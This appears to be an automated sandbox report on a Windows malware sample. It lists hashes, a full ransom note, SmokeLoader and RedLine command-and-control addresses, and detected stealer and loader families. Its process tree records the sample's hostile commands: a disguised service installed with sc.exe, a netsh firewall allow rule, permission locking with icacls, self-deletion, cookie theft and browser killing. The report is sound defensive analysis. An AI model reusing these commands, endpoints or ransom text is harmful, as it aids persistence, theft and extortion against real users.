Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    1800s
  • max time network
    1804s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    09-07-2021 23:00

General

  • Target

    toolspab2 (13).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-mNr1oio2P6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0315ewgfDdSgcyhrmIFKlwG8I3XxekHbYahiFXX0aowKJPQVTk
URLs

https://we.tl/t-mNr1oio2P6

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

BtcOnly

C2

185.53.46.82:3214

Extracted

Family

redline

C2

82.202.161.37:26317

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Vidar Stealer 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 57 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 23 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 27 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
      PID:344
      • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
        C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:6292
        • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
          C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
          3⤵
          • Executes dropped EXE
          PID:6696
      • C:\Users\Admin\AppData\Roaming\jtcuwff
        C:\Users\Admin\AppData\Roaming\jtcuwff
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:4824
      • C:\Users\Admin\AppData\Roaming\aicuwff
        C:\Users\Admin\AppData\Roaming\aicuwff
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:6884
        • C:\Users\Admin\AppData\Roaming\aicuwff
          C:\Users\Admin\AppData\Roaming\aicuwff
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          PID:6232
      • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
        C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:1816
        • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
          C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
          3⤵
          • Executes dropped EXE
          PID:6296
      • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
        C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:4360
        • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
          C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
          3⤵
          • Executes dropped EXE
          PID:7004
      • C:\Users\Admin\AppData\Roaming\jtcuwff
        C:\Users\Admin\AppData\Roaming\jtcuwff
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks SCSI registry key(s)
        PID:4308
      • C:\Users\Admin\AppData\Roaming\aicuwff
        C:\Users\Admin\AppData\Roaming\aicuwff
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:6504
        • C:\Users\Admin\AppData\Roaming\aicuwff
          C:\Users\Admin\AppData\Roaming\aicuwff
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          PID:4324
      • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
        C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:5880
        • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
          C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
          3⤵
          • Executes dropped EXE
          PID:6828
      • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
        C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:6360
        • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
          C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
          3⤵
          • Executes dropped EXE
          PID:5912
      • C:\Users\Admin\AppData\Roaming\jtcuwff
        C:\Users\Admin\AppData\Roaming\jtcuwff
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks SCSI registry key(s)
        PID:6020
      • C:\Users\Admin\AppData\Roaming\aicuwff
        C:\Users\Admin\AppData\Roaming\aicuwff
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:5560
        • C:\Users\Admin\AppData\Roaming\aicuwff
          C:\Users\Admin\AppData\Roaming\aicuwff
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          PID:852
      • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
        C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:3744
        • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
          C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe --Task
          3⤵
          • Executes dropped EXE
          PID:5052
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1164
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2368
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2604
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2712
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
              • Modifies registry class
              PID:2724
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2380
              • C:\Users\Admin\AppData\Local\Temp\toolspab2 (13).exe
                "C:\Users\Admin\AppData\Local\Temp\toolspab2 (13).exe"
                1⤵
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4056
                • C:\Users\Admin\AppData\Local\Temp\toolspab2 (13).exe
                  "C:\Users\Admin\AppData\Local\Temp\toolspab2 (13).exe"
                  2⤵
                  • Loads dropped DLL
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:928
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1924
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1380
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1368
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1112
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:996
                        • \??\c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                          1⤵
                          • Suspicious use of SetThreadContext
                          PID:412
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                            • Drops file in System32 directory
                            • Checks processor information in registry
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            PID:3084
                        • C:\Users\Admin\AppData\Local\Temp\18E8.exe
                          C:\Users\Admin\AppData\Local\Temp\18E8.exe
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:3672
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                            PID:4004
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe
                            1⤵
                              PID:2140
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                                PID:2428
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe
                                1⤵
                                • Suspicious behavior: MapViewOfSection
                                PID:3956
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:2100
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe
                                  1⤵
                                  • Suspicious behavior: MapViewOfSection
                                  PID:3816
                                • C:\Windows\SysWOW64\explorer.exe
                                  C:\Windows\SysWOW64\explorer.exe
                                  1⤵
                                    PID:4056
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe
                                    1⤵
                                    • Suspicious behavior: MapViewOfSection
                                    PID:3576
                                  • C:\Windows\SysWOW64\explorer.exe
                                    C:\Windows\SysWOW64\explorer.exe
                                    1⤵
                                      PID:2660
                                    • C:\Users\Admin\AppData\Local\Temp\7263.exe
                                      C:\Users\Admin\AppData\Local\Temp\7263.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • Suspicious use of WriteProcessMemory
                                      PID:3808
                                      • C:\Users\Admin\AppData\Local\Temp\7263.exe
                                        C:\Users\Admin\AppData\Local\Temp\7263.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Modifies system certificate store
                                        PID:4080
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                          3⤵
                                          • Modifies file permissions
                                          PID:1716
                                        • C:\Users\Admin\AppData\Local\Temp\7263.exe
                                          "C:\Users\Admin\AppData\Local\Temp\7263.exe" --Admin IsNotAutoStart IsNotTask
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4016
                                          • C:\Users\Admin\AppData\Local\Temp\7263.exe
                                            "C:\Users\Admin\AppData\Local\Temp\7263.exe" --Admin IsNotAutoStart IsNotTask
                                            4⤵
                                            • Executes dropped EXE
                                            • Modifies extensions of user files
                                            PID:4192
                                            • C:\Users\Admin\AppData\Local\a2d66298-916d-433d-87c6-f4cec31f9906\build2.exe
                                              "C:\Users\Admin\AppData\Local\a2d66298-916d-433d-87c6-f4cec31f9906\build2.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:5324
                                              • C:\Users\Admin\AppData\Local\a2d66298-916d-433d-87c6-f4cec31f9906\build2.exe
                                                "C:\Users\Admin\AppData\Local\a2d66298-916d-433d-87c6-f4cec31f9906\build2.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks processor information in registry
                                                PID:5780
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\a2d66298-916d-433d-87c6-f4cec31f9906\build2.exe" & del C:\ProgramData\*.dll & exit
                                                  7⤵
                                                    PID:1716
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im build2.exe /f
                                                      8⤵
                                                      • Kills process with taskkill
                                                      PID:2696
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 6
                                                      8⤵
                                                      • Delays execution with timeout.exe
                                                      PID:6296
                                      • C:\Users\Admin\AppData\Local\Temp\8204.exe
                                        C:\Users\Admin\AppData\Local\Temp\8204.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:576
                                      • C:\Users\Admin\AppData\Local\Temp\8495.exe
                                        C:\Users\Admin\AppData\Local\Temp\8495.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:484
                                        • C:\Users\Admin\AppData\Local\Temp\is-TOPLN.tmp\8495.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-TOPLN.tmp\8495.tmp" /SL5="$501D0,506127,422400,C:\Users\Admin\AppData\Local\Temp\8495.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of WriteProcessMemory
                                          PID:3032
                                          • C:\Users\Admin\AppData\Local\Temp\is-68I7T.tmp\1075474_ah_hot_iconçè_)))_.exe
                                            "C:\Users\Admin\AppData\Local\Temp\is-68I7T.tmp\1075474_ah_hot_iconçè_)))_.exe" /S /UID=rec7
                                            3⤵
                                            • Drops file in Drivers directory
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            • Drops file in Program Files directory
                                            • Modifies system certificate store
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1796
                                            • C:\Program Files\Google\XXAUHEAEUZ\irecord.exe
                                              "C:\Program Files\Google\XXAUHEAEUZ\irecord.exe" /VERYSILENT
                                              4⤵
                                              • Executes dropped EXE
                                              PID:1968
                                              • C:\Users\Admin\AppData\Local\Temp\is-FJ7BT.tmp\irecord.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-FJ7BT.tmp\irecord.tmp" /SL5="$B0054,5808768,66560,C:\Program Files\Google\XXAUHEAEUZ\irecord.exe" /VERYSILENT
                                                5⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                • Suspicious use of FindShellTrayWindow
                                                PID:2240
                                                • C:\Program Files (x86)\i-record\I-Record.exe
                                                  "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:4132
                                            • C:\Users\Admin\AppData\Local\Temp\8c-6fee6-74b-688bd-579e0c84b3944\Firukumyco.exe
                                              "C:\Users\Admin\AppData\Local\Temp\8c-6fee6-74b-688bd-579e0c84b3944\Firukumyco.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • Checks computer location settings
                                              PID:1364
                                            • C:\Users\Admin\AppData\Local\Temp\82-0ee01-857-f97b1-048bb1f0a8cb6\Fylaedopidi.exe
                                              "C:\Users\Admin\AppData\Local\Temp\82-0ee01-857-f97b1-048bb1f0a8cb6\Fylaedopidi.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              PID:1552
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zcu5md5g.e3b\GcleanerEU.exe /eufive & exit
                                                5⤵
                                                  PID:3108
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pzfcj1tc.i21\installer.exe /qn CAMPAIGN="654" & exit
                                                  5⤵
                                                    PID:4012
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\30emjo4k.i4q\ufgaa.exe & exit
                                                    5⤵
                                                      PID:5056
                                                      • C:\Users\Admin\AppData\Local\Temp\30emjo4k.i4q\ufgaa.exe
                                                        C:\Users\Admin\AppData\Local\Temp\30emjo4k.i4q\ufgaa.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:5196
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:5552
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5980
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4268
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4296
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bvb55nnr.tks\google-game.exe & exit
                                                        5⤵
                                                          PID:5796
                                                          • C:\Users\Admin\AppData\Local\Temp\bvb55nnr.tks\google-game.exe
                                                            C:\Users\Admin\AppData\Local\Temp\bvb55nnr.tks\google-game.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:6032
                                                            • C:\Users\Admin\AppData\Local\Temp\bvb55nnr.tks\google-game.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\bvb55nnr.tks\google-game.exe" -a
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:3808
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jqis5zvm.iu4\GcleanerWW.exe /mixone & exit
                                                          5⤵
                                                            PID:768
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mlruqehz.gfi\toolspab1.exe & exit
                                                            5⤵
                                                              PID:4536
                                                              • C:\Users\Admin\AppData\Local\Temp\mlruqehz.gfi\toolspab1.exe
                                                                C:\Users\Admin\AppData\Local\Temp\mlruqehz.gfi\toolspab1.exe
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:6016
                                                                • C:\Users\Admin\AppData\Local\Temp\mlruqehz.gfi\toolspab1.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\mlruqehz.gfi\toolspab1.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Checks SCSI registry key(s)
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:2144
                                                    • C:\Users\Admin\AppData\Local\Temp\9659.exe
                                                      C:\Users\Admin\AppData\Local\Temp\9659.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:1816
                                                      • C:\Users\Admin\AppData\Local\Temp\9659.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\9659.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Modifies data under HKEY_USERS
                                                        PID:6872
                                                    • C:\Users\Admin\AppData\Local\Temp\98FA.exe
                                                      C:\Users\Admin\AppData\Local\Temp\98FA.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      PID:3532
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\swqtkajm\
                                                        2⤵
                                                          PID:8
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hcyfrbpe.exe" C:\Windows\SysWOW64\swqtkajm\
                                                          2⤵
                                                            PID:364
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" create swqtkajm binPath= "C:\Windows\SysWOW64\swqtkajm\hcyfrbpe.exe /d\"C:\Users\Admin\AppData\Local\Temp\98FA.exe\"" type= own start= auto DisplayName= "wifi support"
                                                            2⤵
                                                              PID:736
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "C:\Windows\System32\sc.exe" description swqtkajm "wifi internet conection"
                                                              2⤵
                                                                PID:4216
                                                              • C:\Windows\SysWOW64\sc.exe
                                                                "C:\Windows\System32\sc.exe" start swqtkajm
                                                                2⤵
                                                                  PID:4396
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                  2⤵
                                                                    PID:4516
                                                                  • C:\Users\Admin\vuubsors.exe
                                                                    "C:\Users\Admin\vuubsors.exe" /d"C:\Users\Admin\AppData\Local\Temp\98FA.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:4532
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nielxhvk.exe" C:\Windows\SysWOW64\swqtkajm\
                                                                      3⤵
                                                                        PID:4504
                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                        "C:\Windows\System32\sc.exe" config swqtkajm binPath= "C:\Windows\SysWOW64\swqtkajm\nielxhvk.exe /d\"C:\Users\Admin\vuubsors.exe\""
                                                                        3⤵
                                                                          PID:4912
                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                          "C:\Windows\System32\sc.exe" start swqtkajm
                                                                          3⤵
                                                                            PID:800
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                            3⤵
                                                                              PID:4820
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1484.bat" "
                                                                              3⤵
                                                                                PID:5256
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1
                                                                                  4⤵
                                                                                  • Runs ping.exe
                                                                                  PID:6000
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1
                                                                                  4⤵
                                                                                  • Runs ping.exe
                                                                                  PID:4312
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1
                                                                                  4⤵
                                                                                  • Runs ping.exe
                                                                                  PID:3032
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1
                                                                                  4⤵
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                  • Runs ping.exe
                                                                                  PID:5800
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1
                                                                                  4⤵
                                                                                  • Runs ping.exe
                                                                                  PID:1128
                                                                          • C:\Users\Admin\AppData\Local\Temp\A34C.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\A34C.exe
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1132
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                              2⤵
                                                                                PID:4904
